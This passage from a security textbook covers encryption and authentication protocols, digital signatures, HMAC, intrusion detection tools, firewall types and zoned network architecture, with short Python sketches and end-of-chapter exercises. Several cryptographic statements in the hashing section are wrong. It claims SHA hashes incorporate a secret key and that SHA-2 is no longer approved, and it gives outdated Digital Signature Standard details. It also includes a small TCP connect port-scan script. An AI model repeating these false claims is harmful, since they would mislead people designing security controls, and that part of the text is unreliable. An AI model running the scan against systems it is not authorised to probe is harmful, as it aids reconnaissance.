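The public-key property of Eq. 8.2 can be demonstrated with the third-party Python cryptography package (an assumption; any RSA library would serve). Note that libraries restrict public-key encryption to small payloads, exactly as described next:

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()   # may be advertised to the world

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Anyone holding the public key can encrypt a small payload (e.g., a
# session key for key exchange)...
ciphertext = public_key.encrypt(b"temporary session key", oaep)

# ...but only the private-key holder can decrypt it (Eq. 8.2).
assert private_key.decrypt(ciphertext, oaep) == b"temporary session key"
```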


However, public-key encryption is extremely processor-intensive. Thus, it is less attractive for large-scale encryption purposes, such as a file transfer or web session, and is used to encrypt only small amounts of data. For example, it is used in key exchange, to communicate a secret key to be used during one temporary communications session. Popular algorithms include Diffie-Hellman, RSA (Rivest, Shamir, Adleman), El Gamal, and Elliptic Curve Cryptosystems [6]. NIST-approved algorithms include RSA and the Elliptic Curve Digital Signature Algorithm (ECDSA) [16].

Quantum-Resistant Encryption  Quantum computers are the next generation of super-computing power, and the technology is still evolving. To prepare, the U.S. National Institute of Standards and Technology (NIST) is evaluating a set of encryption algorithms that will be quantum-safe. One approved algorithm is CRYSTALS-Kyber, which requires relatively small encryption keys that two parties can feasibly exchange, and offers a reasonable speed of operation [12]. It uses a learning-with-errors technique. CRYSTALS-Kyber key sizes are four times the length of AES key sizes, for roughly equivalent security on quantum computers (e.g., Kyber-768 approximates AES-192 security) [13].

Application protocols that support encryption include [3, 6]:

• Secure Web (S-HTTP): Encrypts single web message(s).
• Secure Web: HTTP over SSL (HTTPS): Protects a web session (or conversation) using the SSL/TLS protocol.
• Secure Sockets Layer (SSL)/Transport Layer Security (TLS): Provides confidentiality (key exchange, data encryption), integrity, and authentication (server and optional client).
• Secure File Transfer Protocol (SFTP): Encrypted file transfer using the SSH protocol.
• Secure Shell 2 (SSH2): Remote login to UNIX or Linux systems. Supports configurable confidentiality (key exchange, data encryption), integrity (HMAC-SHA-3, HMAC-MD5), and, in the commercial version, authentication (public key certificates).
• Email: Pretty Good Privacy (PGP): Users establish a web of trust, where they informally share public keys. The private key is stored on a disk drive, protected by a pass phrase. This protocol supports configurable confidentiality (key exchange = RSA, data encryption = IDEA), integrity (MD5), authentication (public key certificates), and non-repudiation (digital signature).
• Email: Secure/Multipurpose Internet Mail Extension (S/MIME): Enables the signing and encrypting of email and attachments, using encryption (3DES, ElGamal), integrity (SHA-1), authentication (public key certificates), and non-repudiation (digital signature).
• Client/Server: Kerberos: This tool authenticates clients and servers, and supports confidentiality through key exchange and encryption. It is commonly used in Windows, UNIX/Linux, and Mac networks, particularly for single sign-on environments. It is highly configurable, which may result in compatibility issues.


• Virtual Private Network (VPN): A VPN encrypts all application packets between two endpoints. Both endpoints need to be configured to support the VPN protocol. VPNs are easy to use and inexpensive, but can be more difficult to set up and troubleshoot. VPNs do not solve malware problems or unauthorized actions; they just encrypt them. Often an organization's router or firewall is a VPN endpoint, which decrypts the VPN messages.
• IPsec Protocol: Supports an Authentication Header, which provides source authentication and integrity, or optionally an Encapsulating Security Payload (ESP), which provides authentication, integrity, and confidentiality. The algorithms used are configurable and negotiated.
• Point-to-Point Tunneling Protocol (PPTP): Provides encryption (RC4).
• Wi-Fi Protected Access (WPA, WPA2, WPA3): Wireless Local Area Networks (WLANs) require a secure implementation. Every person who drives by your office potentially has access to your computer systems unless you have a well-configured WLAN that includes authentication and encryption. Early protocols, WEP and WPA, offered insufficient encryption, and each subsequent version (WPA, WPA2, WPA3) offers improved security. WPA uses a 128-bit key and the MAC address to provide unique encryption per device [7]; the Temporal Key Integrity Protocol changes the key about every 10,000 packets, and the key exchange process includes authentication of both client and access point. WPA2 uses AES encryption and includes optional security enhancements, including integration of Kerberos and RADIUS. WPA3 is the newest, most secure option, and includes a personal and an enterprise mode [18]. The personal mode improves encryption, even when users select poorer passwords, and provides Simultaneous Authentication of Equals (SAE), which protects against password guessing by authenticating both devices. Enterprise mode provides an optional mode that supports a 192-bit key length. WPA3 is backward compatible with WPA2 when so configured (but rejects WPA); thus, WPA3 APs can interoperate with WPA2 devices, but with reduced security.

A good basic configuration description for wireless and other network devices can be found at: www.cisecurity.org/white-papers/cis-controls-telework-and-small-office-network-security-guide/.

8.3.2 Authenticity and Non-Repudiation

Kerberos, discussed in the Confidentiality section, is also a key method of authentication. Other authentication and non-repudiation techniques include [3, 6, 8]:


Centralized Access Control supports centralized servers that authorize credentials and indicate access control capabilities for single sign-on. They can also provide an accounting/audit service to track usage. Products include RADIUS (Remote Access Dial-In User Service) and TACACS (Terminal Access Controller Access-Control System), which is a family of products.

Authentication is best performed using two-factor authentication or better. A second factor can include a token, such as a smartcard, flash drive, or RSA token that displays a synchronized random number. Other second factors include biometrics or an SMS passcode sent to a cell phone, providing a one-time (single-use) password.

Public Key Infrastructure (PKI) is a set of standards approved by the International Standards Organization (ISO). PKI provides an infrastructure to support confidentiality, integrity, authenticity, and non-repudiation in a flexible, configurable way. Every user (e.g., John) of PKI must register with a Registration Authority, who verifies that entity's identity. John then obtains a Digital Certificate, which is maintained with a Certificate Authority (CA). The Digital Certificate includes information about John, including his public key. When Joan wants to communicate with John, with assured authentication, Joan requests John's Digital Certificate through the CA. The CA is a trusted organization that effectively vouches for John. When Joan has John's public key, she can verify his digital signature and/or perform key exchanges with him.

Digital Signatures provide non-repudiation for contractual compliance. To create a digital signature, a message is hashed for integrity. The hash is then encrypted using the sender's private key. When the receiver receives the message plus the encrypted hash, they use the sender's public key to decrypt the received hash. If the decrypted hash matches the hash calculated over the received message, then the message was authentically sent by the sender and was not modified during transmission. The Digital Signature Standard is defined by NIST to use a 160-bit SHA hash and RSA or elliptic curve encryption. There are three NIST-approved digital signature algorithms: DSA (Digital Signature Algorithm) and the public key encryption algorithms RSA and ECDSA [16].

Digital signatures approved by NIST that are quantum-safe include CRYSTALS-Dilithium, FALCON, and SPHINCS+. CRYSTALS-Dilithium and FALCON are faster and more efficient, and FALCON enables smaller signatures when necessary. SPHINCS+ uses a different type of algorithm and thus provides diversity of algorithms [12].
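The hash-then-encrypt procedure above is what crypto libraries expose as sign/verify. A minimal sketch, again assuming the third-party Python cryptography package:

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

signer_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
message = b"I agree to the contract terms."

pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)

# Sign: hash the message, then encrypt the hash with the private key.
signature = signer_key.sign(message, pss, hashes.SHA256())

# Verify with the sender's public key; raises InvalidSignature if the
# message was modified in transit or not signed by the matching private key.
signer_key.public_key().verify(signature, message, pss, hashes.SHA256())
```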

8.3.3 Integrity Controls

Hashing or Message Digests provide integrity by adding a sophisticated form of checksum, which is calculated using a secret key and multiple, complex operations across each segment of a data stream. Algorithms recognized as safe include [3, 6]:


Fig. 8.4  Secure message authentication code calculations

Secure Hash Algorithm (SHA): SHA incorporates a secret key into the hash algorithm. Figure 8.4 (top algorithm) shows that both the receiver and sender calculate the hash value (H) using a key (K), and the sender appends the hash to the data for transmission. The receiver compares the received and calculated hashes. Approved NIST hashing algorithms include the SHA-3 versions SHA3-224, SHA3-256, SHA3-384, and SHA3-512, where the number in the name reflects the hash size. Larger numbers also reflect higher security levels, and the 384 and 512 algorithms can also be used for larger messages (>2^64 bits). SHA-3 supports a higher level of security at increased efficiency compared to SHA-1 or SHA-2 (which are no longer approved). SHA is used by digital signatures [15].

Hashed Message Authentication Code (HMAC): An HMAC creates a hash based on the message concatenated with a secret key (see Fig. 8.4). The message and hash are transmitted to the remote side. The receiver also concatenates the secret key to the message to calculate a hash. The calculated hash is compared to the received hash. HMAC is used in IPsec, TLS/SSL, and SET protocols. Approved NIST algorithms include the Keyed-Hash Message Authentication Code (HMAC), the KECCAK Message Authentication Code (KMAC), and the CMAC Mode for Authentication (CMAC) [17]. Outdated algorithms include the message digests MD2, MD4, and MD5.
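The HMAC flow of Fig. 8.4 maps directly onto Python's standard library; the key and message below are illustrative:

```python
import hashlib
import hmac

key = b"shared secret key"
message = b"transfer 100.00 to account 42"

# Sender: compute the tag over key + message and append it to the data.
tag = hmac.new(key, message, hashlib.sha3_256).digest()

# Receiver: recompute the tag and compare in constant time.
def verify(key: bytes, message: bytes, received_tag: bytes) -> bool:
    expected = hmac.new(key, message, hashlib.sha3_256).digest()
    return hmac.compare_digest(expected, received_tag)

assert verify(key, message, tag)
assert not verify(key, b"transfer 999.00 to account 66", tag)
```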

8.3.4 Anti-Hacker Controls

Large organizations may have a dedicated Security Operations Center (SOC) that monitors for security issues 24 hours per day, 7 days per week, every day of the year [20]. Whether or not an organization has such full coverage, it is always important to have anti-hacker tools in a network. This section describes additional security controls. SC Magazine evaluates security products in its Product Section and is a great source for further information on specific products. Table 8.5 lists ranges of prices for products, as recently evaluated by SC Magazine.

Table 8.5  Security products

Application firewalls (types: database firewall, web firewall): $7000–41,000
Authentication (types: flash drive token, RSA token, fingerprint, voice/facial recognition): $1.30–46 per user OR $650–11,000 per site
Email security mgmt.: $15 per user to $17,000 per site
Endpoint security: $20–93 per user
Mobile device security: $25–60 per user
Risk & policy mgmt.: $485–45,000 per site OR $10–50 per endpoint
Security information and event mgmt. (SIEM): $2000–42,000 per site or per year
Unified threat mgmt. (UTM): $300–31,000 per unit
Virtual security solutions (types: cloud support, compliance, encrypted memory): $50 per virtual server to $64,000 per site
Vulnerability assessment tools: $2500–40,000 per site

The remainder of this section describes simple/individual security components before building up to multi-featured tools (from SC Magazine [3, 6, 20]).

Bastion host is a computer that is attack-resistant. All but the necessary applications are turned off, the security configuration is optimized, and the operating system and all applications are patched.

Antimalware includes antivirus and usually antispyware; it is software that inspects the content of applications/files entering the computer, screening for malicious programs (or malware). Antimalware software can be configured as part of a sophisticated firewall, an email server, and/or hosted on end-user machines.

Data loss prevention (DLP) monitors, detects and reacts to abnormal behavior on servers to prevent suspect data transmissions. It incorporates policy-based controls to monitor behavior.

Endpoint security features antimalware and firewall capabilities, but in addition this end-user product prevents data leakage by controlling access to files, folders and removable media. It may provide centralized control to automate enforcement and monitoring of organizational policies.

Email security management tools, commonly implemented on an email server, support antimalware, anti-phishing and spam control. They can encrypt email, enforce email policies for regulatory or internal compliance, and prevent data leakage in outgoing email.

Mobile Devices and Bring Your Own Device (BYOD) are a threat, since emerging technologies such as smartphones lack maturity in regard to security. When mobile devices are used for both business and pleasure, these devices can expose the internal network to malware, and imperil confidential or proprietary secrets when company data is accessed.

A secure policy is to insist that employees not use personal devices to access company data, or company devices to access personal data. Mobile device security enforces organizational policy, such as applying authentication/password requirements, allowing viewing but not storing of company data, and forbidding or permitting only certain software installations. It also features antimalware, remote wiping, browser content filtering, and possibly two-factor authentication. Some versions enable the device to be split, using containers, to isolate personal and company data [9, 10]. A 'container' can encrypt the business side of the device, and enable secure wiping of that side only [10].

Event Logs are generated by applications, operating systems and other system software to issue a warning or error, or to record that an action was performed (e.g., clearing of a log file). Logs are important to monitor to detect attacks or risky behavior. Operating systems allow logs to be configured specifically for an organization (via enable/disable mechanisms). A large quantity of logs provides information for detecting and analyzing intrusions, but requires a large amount of storage. Regulations and standards such as HIPAA and PCI DSS require regular log monitoring.

Security Information and Event Management (SIEM) tools assist in log reduction (or summarization), prioritization and correlation. In addition to saving administrators daily time poring over hundreds of logs, they collect metrics for risk purposes, generate reports for compliance and help in forensic analysis of log data. They may collect logs from user, server and/or network devices. Another form of this is Extended Detection and Response (XDR).

Application Firewalls protect either a web server or a database, by monitoring activity, detecting attacks and reporting on both. They are also useful in preventing data leakage and countering DDoS attacks.

Web Gateways often protect user zones by restricting transmissions to unauthorized websites, caching frequently used authorized websites, and tracking all accesses.

Intrusion Prevention System (IPS) or Intrusion Detection System (IDS) is an advanced tool that recognizes attack packets, actions or patterns. Detection systems log or report unsafe behavior to administrators, while prevention systems actually halt unsafe behavior. The major issue is whether unsafe behavior can be accurately determined. There are two ways that intrusion systems can be hosted in a network:

• Network IDS/IPS: This is a networked device which examines packets traversing a network or zone for attacks, such as worms, viruses, or scanning attacks. A NIPS would block dangerous packets, while a NIDS would simply report or log unsafe packets for the administrator.
• Host IDS/IPS: Examines actions or resources on one host computer or server for unusual or inappropriate behavior. For example, it may detect modification or deletion of special files.

There are three ways for intrusion systems to find attacks. Attacks may be recognized via a signature-based algorithm, or exact pattern match. This is commonly used in antivirus software to match for a worm or virus. Statistical-based algorithms recognize deviations from a norm: for example, most work occurs from 8 AM to 6 PM, and high server use at 3 AM could raise a red flag.

Neural networks recognize deviations from patterns using a statistical-based algorithm combined with self-learning (or artificial intelligence). High-security industries recognize that if network traffic volume for a particular type of data suddenly balloons to 10 times its normal volume, the event should be investigated right away. IDS/IPS tools must be properly configured by security staff to recognize attacks. This may be difficult, since illegitimate behavior may look like abnormal but legal behavior. For example, heavy use of a server at 3 AM is normally unusual and potentially deviant, except perhaps when a scheduled deadline approaches.

Unified Threat Management (UTM) tools combine firewall, IPS, antivirus, spam/email protection, web content filtering, application control and VPN capabilities into one super-firewall device. Important concerns should be redundancy and bandwidth. It is prudent to restrict access to particular web sites, such as social and email sites, to minimize threats of malware. Better yet is to permit access to only a limited set of Internet sites.

Vulnerability Management tools scan the network, hosts and operating systems for vulnerabilities, such as new services and devices (e.g., rogue access points), their versions and asset types, incorrect configurations, and unpatched software. With this information, vulnerability scanners may then estimate and prioritize risk (hopefully accurately). Periodic scans may be required by regulations and PCI DSS, but the Center for Internet Security (CIS) recommends continuous vulnerability management to minimize the possible window for attack [19]. Sophisticated tools will automatically run on schedule, update themselves for new vulnerabilities, and produce reports. Some tools may support automatic fixing of vulnerabilities.

Restricted Devices, Restricted Services: One thing that vulnerability management may implement is monitoring that only permitted devices are connected and that those devices are properly configured, including their security profile and available applications.

Penetration Testing is not a tool per se, but a test performed by paid expert attackers, used to identify vulnerabilities in a network beyond what vulnerability management tools can find. Penetration testers actually attempt to break into a network to access critical data or systems.

Risk and Policy Management tools are database systems that support risk analysis, risk treatment, policy enforcement and incident tracking. The policy management aspect may track patch implementations and enforce/monitor other configuration policies on end-user and/or network devices. This may help in managing and reporting for regulatory compliance.

Honeypot/Honeynet is a system or network that is meant to attract and catch attackers. A honeypot system has no functions other than a special application which appears easy to break into. All traffic going to a honeypot/net should be regarded as suspicious. Honeypots/nets are risky to implement because they must be carefully monitored; if this system is successfully penetrated, the attackers will have a convenient launching pad for further attacks.

It is possible to hire or contract outside expert services, particularly for small to medium sized businesses that lack IT and security expertise (from SC Magazine):

Managed Security Service Providers (MSSPs) offer a basic service to help configure and manage networks for security. They can optimize compliance, identity and access management (IAM), technology replacement and log/alarm maintenance.

Managed Detection and Response (MDR) is a specialty service that uses artificial intelligence (AI) to deal with AI-enabled threats and incidents. Services include threat hunting, detection and response; continuous monitoring; and guided remediation. Threat hunting proactively searches for and eliminates threats before an attack is launched. It includes recognizing abnormal network traffic or testing possible attack scenarios.
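To make the statistical-based detection idea described earlier more concrete, the sketch below flags traffic volumes that deviate sharply from a historical norm. The baseline counts and the three-standard-deviation threshold are invented for illustration; a production IDS or threat-hunting tool would profile many features, not just hourly volume.

    # Statistical anomaly detection sketch: flag hours whose traffic
    # volume deviates too far from the historical mean (z-score test).
    from statistics import mean, stdev

    # Hypothetical baseline: packets per hour observed over normal days.
    baseline = [1200, 1350, 1280, 1310, 1190, 1400, 1330, 1250]

    mu = mean(baseline)
    sigma = stdev(baseline)
    THRESHOLD = 3.0      # flag anything beyond 3 standard deviations

    def is_anomalous(observed_volume: float) -> bool:
        """Return True if the observed volume deviates from the norm."""
        z = abs(observed_volume - mu) / sigma
        return z > THRESHOLD

    print(is_anomalous(1300))    # False: within the normal range
    print(is_anomalous(13000))   # True: ~10x normal volume, investigate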

8.4 Defining the Network Architecture

Now it is time to put all the pieces together. Figure 8.5 shows a diagram of a network, where different colors reflect confidentiality levels: black = proprietary or confidential, gray = privileged, and white = public. There are three zones: the Demilitarized Zone, where anyone can send us email, access our web, or translate Internet names to IP addresses; the Confidential Payment Card Zone, where we handle payment cards; and the Internal Network Zone, which is where our employees do their thing. Since this firewall supports three (or more) zones, it is a multi-homed firewall.

There is a screening device, a Border Router, which screens obvious attack packets. This allows our firewall (a 'screened host') to spend more time checking the remaining, maybe-safe packets. A border router is a regular router put at the border between our network and the Internet.

Fig. 8.5  Fundamental network architecture

It screens for illegal applications (port numbers), and invalid source and destination IP addresses, similarly to what is shown in Fig. 8.1.

The firewall and Intrusion Prevention System (IPS) could be separate or a combined device. A Unified Threat Management device can do both functions. The firewall may perform circuit-level screening to verify proper connection sequencing, while the IPS searches throughout each packet for attack signatures (malware) and finds attack patterns across packets. An Intrusion Detection System (IDS) observes and reports attack packets in the Internal Network Zone. It cannot block packets, the way an IPS can.

A system for logs is not shown in this figure. For secure networks, logs may be transmitted to a central database. In highly secure networks, the transmission lines for these logs would be separated from the regular network, to reduce the probability of a Denial of Service attack.

It is also possible to have dual in-line firewalls, to doubly screen input. For example, there could be a border router, firewall, DMZ, firewall, then Internal Network Zone. In this case of a screened subnet, packets going to the Internal Network Zone would pass through the DMZ and be filtered through two (dual) sequential (in-line) firewalls. Figure 8.6 is an example of this. This configuration has the advantage of defense in depth and redundancy.

[Figure 8.6 depicts: Internet, Border Router, and a De-Militarized Zone (Email, Public Web, Public DNS), plus internal zones: Wireless Net Zone; Student Zone (Labs, Dorms); Privileged User Zone (Classroom, Faculty Terminals); Confidential Server Zone (Student Registration, Health Services); Privileged Server Zone (Student Scholastic, Student Files, Faculty Files).]

Fig. 8.6  Network diagram for simplified university scenario (workbook exercise)
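As a concrete illustration of the screening a border router or packet filter performs (checking application port numbers and source addresses, as in Fig. 8.1), here is a minimal sketch. The allowed ports, address range, and packet values are invented for the example.

    # Packet-filter screening sketch: drop packets whose port or source
    # address violates the configured rules (illustrative values only).
    from ipaddress import ip_address, ip_network

    ALLOWED_PORTS = {25, 53, 80, 443}            # email, DNS, web
    INTERNAL_NET = ip_network("10.0.0.0/8")      # our address space

    def screen(src_ip: str, dst_port: int, from_internet: bool) -> bool:
        """Return True if the packet may pass, False to drop it."""
        if dst_port not in ALLOWED_PORTS:
            return False                 # illegal application/port number
        # Spoofed source: a packet arriving from the Internet must not
        # claim an internal source address.
        if from_internet and ip_address(src_ip) in INTERNAL_NET:
            return False
        return True

    print(screen("203.0.113.9", 443, True))   # True: allowed web traffic
    print(screen("10.1.2.3", 443, True))      # False: spoofed internal source
    print(screen("203.0.113.9", 23, True))    # False: telnet not permitted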

8.4.1 Step 5: Draw the Network Diagram

It is now time to draw the complete network, so we can evaluate it for various paths of logical access. A Path of Logical Access is a diagram that shows where transactions can enter the system, where they are security-controlled, and where they are processed. Evaluating such paths can ensure there is sufficient defense in depth. A good text description explains why the network architecture is as shown and can further explain logical paths of access. The diagram can show separated or combined servers, with servers colored according to their sensitivity class: Green = Public, Yellow = Privileged, Red = Confidential, Purple = Proprietary – or the black-gray-white version used in this text.

Figure 8.6 shows a simplified diagram for the university scenario. Six internal network zones are shown, and all servers are color-coded according to sensitivity. The servers are not broken out, but instead listed under their zone name. This diagram was drawn with Microsoft Visio, which offers easy diagramming capabilities and a variety of network icons. The students and faculty in this network are free to access any web sites and open any email links, which makes network users highly likely to have malware. Therefore it is extremely important to separate even internal users from the data servers, which contain privileged or confidential information.

The paths of logical access generally enter via the Internet, wireless network, student labs or faculty/classrooms. Notice that to get into the DMZ or student computer labs, packets traverse one firewall. Filtering through two firewalls is required to enter either of the secure server zones or the faculty/classroom computers. Even internal users go through at least one firewall to get to secure servers.

This is a traditional secure network. A next generation of network security is described in the chapter on Alternate Networks, which covers Zero Trust networks; many organizations also depend on cloud configurations, which that chapter describes as well. In the Workbook, Chap. 4 should include your network design, and Chap. 5 should include the firewall and router configurations. Professional network administration personnel should assist in configuring network equipment (firewalls, routers) and virtual machines/servers according to the requirements established in this chapter, and in ensuring additional network security.

8.5 Advanced: How it Works

This chapter on Network Security is already very technical, but for those who plan on making a career in security, this advanced section helps to explain how different classes of firewalls work [6]. Figures 8.7a–d show four common configurations for increasingly secure firewalls.

Fig. 8.7 (a) Packet filter. (b) Stateful Inspection. (c) Circuit-level firewall. (d) Application-level firewall or proxy server

The Packet Filter (Fig. 8.7a) filters according to TCP and IP addresses, as was shown in Fig. 8.1. The cigarette-looking thing below the firewall shows in black and white how much of each packet is evaluated by the firewall. In a Packet Filter, only the (black) TCP and IP packet headers are scanned, and the remainder of the packet, including the (white) application contents, is not filtered. The two 'A's shown on the terminal and host indicate that connection A is established between the terminal and host, and the firewall does not participate in or track the connection status.

Stateful Inspection (Fig. 8.7b) is an enhancement of Packet Filtering, since the firewall tracks the state of each connection. (Hence the 'A' now shows up in the firewall.) This means that the firewall can detect if an attacker spoofs a connection, by sending out-of-sequence packets, or sends data packets when no connection is established. Tracking the connection status means that a little more of the TCP header is now investigated by the firewall, so a little more of the packet is shown in black.

With the Circuit-Level Firewall (Fig. 8.7c), one connection is established between the terminal and the firewall, and a second is established between the firewall and the host. In this case, the network header is not only inspected, but also processed for even greater integrity. This additional processing means that fragmented packets are reassembled before being evaluated for malware and attacks.

The Application-Level Firewall or Proxy Server (Fig. 8.7d) performs everything that the other firewalls do, but in addition checks through much of the application data. That is why the packet is mostly inspected (in black) with very little of the packet uninspected (in white).

A network security design and implementation is not complete without a good test [7, 11]. After a network is configured, a network specialist should scan servers, workstations, and control devices to determine service availability and vulnerabilities.

Vulnerability scanners can scan for open services, recent patching, and configuration weaknesses. Firewalls and routers can be tested to ensure that filtering and logging occur as designed. Penetration testing uses hacker techniques to try to break into a network. The network should also adhere to policy and standards, such as the implementation and monitoring of network logs and proper reaction to events. Web servers require special testing to ensure that confidentiality, integrity, authentication and non-repudiation are all properly implemented. They should also be tested for attacks such as SQL injection, cross-site scripting and buffer overflows, as well as for proper data processing. These are further discussed in the section on Secure Software Development. Some regulations/standards require network testing. PCI DSS requires quarterly scans and annual audits, as does the American regulation FISMA. Sarbanes-Oxley requires regular audits, of which penetration testing should be a component.
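A vulnerability scan typically begins by discovering which services are reachable. Below is a minimal TCP connect-scan sketch; the host address and port list are invented for the example, and such scans should only be run against systems you are authorized to test.

    # TCP connect-scan sketch: report which ports accept connections.
    import socket

    HOST = "192.0.2.10"                 # hypothetical in-scope server
    PORTS = [22, 25, 80, 443, 3389]     # services worth checking

    for port in PORTS:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1.0)           # do not hang on filtered ports
            # connect_ex returns 0 on success instead of raising an error
            if s.connect_ex((HOST, port)) == 0:
                print(f"Port {port} open: service available, check its patch level")
            else:
                print(f"Port {port} closed or filtered")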

8.6 Questions

1. Vocabulary. Match each meaning with the correct vocabulary.

Virtual server, Public key, SQL attack, Nonrepudiation, Digital signature, Secure hash, Honeypot, Hypervisor, Public key encryption, Targeted attack, Authenticity, Digital certificate, Bastion host, Demilitarized zone, Confidential Payment Card Zone, Secret key encryption, Man-in-the-middle attack, Intrusion prevention system, Virtual private network, Public key infrastructure, Unified threat management

(a) An attack oriented toward a specific victim.
(b) A device or software that provides firewall, antivirus and spam filter security functionality.
(c) An exploit that manipulates web form input to alter database commands.
(d) A service which verifies an entity's identity and provides digital certificate information about the entity.
(e) A sophisticated algorithm, calculated over a set of data, that provides a result ensuring the data is not modified in transmission or during storage.
(f) A security goal where the sender cannot deny sending a message.
(g) This information provides authentication data about an entity, as well as their public key.
(h) A hash, encrypted with a private key, serves as a method of nonrepudiation.
(i) A section of the network configured specifically to attract and catch attackers.
(j) A method of encryption where the sender and receiver share an identical key.

(k) A method of encryption where the sender and receiver use complementary, non-identical keys.
(l) A security goal where the claimed sender is the actual sender.
(m) An attacker pretends to be a desired computer network destination.
(n) A method of consolidating services by allocating different services onto a single physical server. Each service has its own operating system.
(o) The software interface between a virtual machine's operating system and the operating system or hardware associated with the physical machine.
(p) An encryption key that is freely distributed to others.
(q) A sophisticated tool that recognizes and mitigates attack packets, actions and patterns.
(r) A segment of the network partitioned by a firewall for use by the general public.
(s) A segment of the network partitioned by a firewall to handle debit and credit card processing.
(t) A configuration where all packets are encrypted between two endpoints.
(u) An attack-resistant computer with an optimized security configuration.

2. Security Design Principles. How does the design for Einstein University implement the following security design principles: separation of domains, isolation, encapsulation, modularity, least privilege, simplicity of design, and minimization of implementation? For each, give an example of how the technique is used, either from Chap. 7 or this chapter.

3. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook, Network Security Chapter, to complete the tables. For each table, include five or more services.
(a) Create a 'Sources and Destinations for Services' Table, similar to Table 8.1.
(b) Create a 'Service Classifications and Roles' Table, similar to Table 8.2.
(c) Create a Zones Table, similar to Table 8.3.
(d) Create a 'Controls for Services' Table, similar to Table 8.4.
(e) Design a Network Diagram, similar to Fig. 8.5 or 8.6.

4. Activity Diagram. Draw a flow chart or activity diagram showing the stages of an attack. Sample activity diagrams include Figs. 5.8, 6.4 and 7.3. Figure 4.1 is an informal diagram.

5. PoS Infection Example. Describe a sample scenario of how a criminal cyber team might remotely attack a Point of Sale device.
(a) What stages might this criminal team pursue, and what would the goals and objectives of each phase be?
(b) What security design weaknesses may help the criminal team during the attack? Discuss how a lack of security design principles in the network architecture, including separation of domains, isolation, encapsulation, modularity and least privilege, would make this attack easier.

6. Virtual Machines. Virtual Machines are traditionally used to separate one server from another. How could a VM also protect users' computers from infected email and web accesses, while still enabling some storage from email/web? Consider how this could be implemented.

7. Product Evaluation. Select one security product to evaluate: a firewall, IDS/IPS, an encryption package, or antivirus software. Look up different websites for this one security product, and select three products to evaluate. What security services do they appear to provide, and for what price?

8. Regulation relating to Network Security. Consider one of the security regulations from your home country, or one of the following American security regulations or standards: HIPAA, Gramm–Leach–Bliley, Sarbanes–Oxley, PCI DSS, or FISMA. What requirements do they have related to Network Security? Some websites provide government- or standards-based information, and thus are authentic sources of information. Consider these sites:
(a) HIPAA/HITECH: www.hhs.gov (Health and Human Services) or Chap. 19
(b) Gramm–Leach–Bliley/Red Flags Rule: www.business.ftc.gov (Federal Trade Commission)
(c) Sarbanes–Oxley: www.isaca.org or www.sans.org (organizations for standards/security)
(d) PCI DSS: www.pcisecuritystandards.org: Requirements and Security Assessment Procedures v. 4.0
(e) FISMA: www.nist.gov (National Institute of Standards and Technology)

8.6.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

Case study: Planning for network security. Health First Case Study: √. Other resources: Security Workbook.

References

1. Crowley S (2014) Obama's speech on N.S.A. phone surveillance (transcript). New York Times, 17 Jan 2014
2. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013
3. Stallings W, Brown L (2012) Computer security: principles and practice, 2nd edn. Pearson Education, Inc, Upper Saddle River, pp 248–277, 623–726
4. Verizon (2014) Verizon 2014 data breach investigations report. http://www.verizonenterprise.com/DBIR/2014. Accessed 30 June 2014
5. PCI Security Standards Council (2013) Requirements and security assessment procedures, ver 3.0, Nov 2013. www.pcisecuritystandards.org

6. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New York, pp 800–843, 853–864
7. Walker M (2012) CEH™ certified ethical hacker all-in-one exam guide. McGraw-Hill Co., New York, pp 274–279
8. Stephenson P (2014) Product section: authentication. SC Mag 25(1):36–47
9. Sutherland C, Halle H, Boroff B (2013) Inside, outside, upside-down: staying ahead of the threat, wherever it is. In: Plenary, SC Congress Chicago, IL, 20 Nov 2013
10. Kolappon R (2013) Security content in the changing landscape of the mobile enterprise. In: SC Congress Chicago, 20 Nov 2013
11. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 320–326, 337–342
12. NIST (2022) NIST announces first four quantum-resistant cryptographic algorithms, July 05, 2022, U.S. National Institute of Standards and Technology. https://www.nist.gov/news-events/news/2022/07/nist-announces-first-four-quantum-resistant-cryptographic-algorithms
13. PQ-Crystals (2020) CRYSTALS: cryptographic suite for algebraic lattices. Dec 23, 2020. https://pq-crystals.org/kyber/index.shtml
14. NIST (2020) Block cipher techniques. June 22, 2020. https://csrc.nist.gov/projects/block-cipher-techniques
15. NIST (2020b) Hash functions. June 22, 2020. https://csrc.nist.gov/projects/hash-functions
16. NIST (2020c) Digital signatures. June 22, 2020. https://csrc.nist.gov/projects/digital-signatures
17. NIST (2020d) Message authentication codes. June 22, 2020. https://csrc.nist.gov/projects/message-authentication-codes
18. Olenick D (2018) Wi-Fi Alliance issues WPA3 standard to improve wireless security. SC Magazine, June 26, 2018. https://www.scmagazine.com/news/content/wi-fi-alliance-issues-wpa3-standard-to-improve-wireless-security
19. CIS (no date) The 18 CIS Critical Security Controls, version 8. https://www.cisecurity.org/controls/cis-controls-list. Accessed 27 Aug 2022
20. SANS (2020) https://www.sans.org/reading-room/whitepapers/cloud/state-cloudsecurity-results-2020-cloud-security-survey-40095

Chapter 9

Designing Physical Security

In 1983, the French embassy in Moscow discovered that the KGB had planted bugs in its teleprinters, which had relayed all their incoming and outgoing telegrams to the Soviets for six years. – [1, page 69]
